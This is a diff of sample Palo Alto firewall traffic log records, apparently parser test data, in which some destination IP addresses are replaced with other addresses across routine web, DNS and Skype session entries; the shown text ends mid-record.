1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 
04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 
09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 
09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 
09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:54,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,50.19.102.116,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 